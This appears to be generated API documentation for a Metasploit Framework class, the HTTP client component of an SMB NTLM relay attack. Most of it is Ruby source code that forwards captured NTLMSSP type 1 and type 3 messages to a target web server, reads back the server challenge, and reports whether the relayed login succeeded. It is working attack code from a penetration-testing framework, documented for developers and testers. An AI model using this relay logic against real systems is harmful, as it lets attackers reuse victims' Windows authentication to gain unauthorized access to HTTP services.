Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Inherits:

Object

• Object
• Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Extended by:

Forwardable

Defined in:

lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb

Overview

The HTTP Client for interacting with the relayed_target

Instance Attribute Summary

• #logger ⇒ Object readonly protected

  Returns the value of attribute logger.

• #target ⇒ Object readonly

  Returns the value of attribute target.

• #timeout ⇒ Object

  Returns the value of attribute timeout.

Class Method Summary

• .create(provider, target, logger, timeout) ⇒ Object

Instance Method Summary

• #disconnect! ⇒ Object
• #initialize(provider: nil, target: nil, logger: nil, timeout: -1)) ⇒ Client constructor

  A new instance of Client.

• #relay_ntlmssp_type1(client_type1_msg) ⇒ Object
• #relay_ntlmssp_type3(client_type3_msg) ⇒ Object
• #send_recv(req, t = -1,, persist = true) ⇒ Object

Constructor Details

#initialize(provider: nil, target: nil, logger: nil, timeout: -1)) ⇒ Client

Returns a new instance of Client.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 11

def initialize(provider: nil, target: nil, logger: nil, timeout: -1)
  @logger = logger
  @provider = provider
  @target = target
  @timeout = timeout
  http_logger_subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: logger)

  @client = Rex::Proto::Http::Client.new(
    target.ip,
    target.port,
    provider.dispatcher.tcp_socket.context,
    target.protocol == :https,
    subscriber: http_logger_subscriber
  )
end

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

Returns the value of attribute logger.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 102

def logger
  @logger
end

#target ⇒ Object (readonly)

Returns the value of attribute target.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 9

def target
  @target
end

#timeout ⇒ Object

Returns the value of attribute timeout.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 8

def timeout
  @timeout
end

Class Method Details

.create(provider, target, logger, timeout) ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 27

def self.create(provider, target, logger, timeout)
  new(
    provider: provider,
    target: target,
    logger: logger,
    timeout: timeout
  )
end

Instance Method Details

#disconnect! ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 36

def disconnect!
  @client.close
end

#relay_ntlmssp_type1(client_type1_msg) ⇒ Object

Parameters:

• client_type1_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 42

def relay_ntlmssp_type1(client_type1_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type1_msg)
    }
  )

  res = @client.send_recv(req, @timeout, true)

  if res.nil?
    msg = "Unable to retrieve server challenge from #{target} (no HTTP response received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  unless res.code == 401
    msg = "Unable to retrieve server challenge from #{target} (HTTP status #{res.code} received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.decode64(res.headers['WWW-Authenticate'].split[1]),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end

#relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Parameters:

• client_type3_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 76

def relay_ntlmssp_type3(client_type3_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type3_msg)
    }
  )
  res = @client.send_recv(req, @timeout, true)

  if res.code.between?(200, 299)
    nt_status = WindowsError::NTStatus::STATUS_SUCCESS
  else
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  end
  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end

#send_recv(req, t = -1,, persist = true) ⇒ Object

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 95

def send_recv(req, t = -1, persist = true)
  # enable persistence by default to keep the connection open
  @client.send_recv(req, t, persist)
end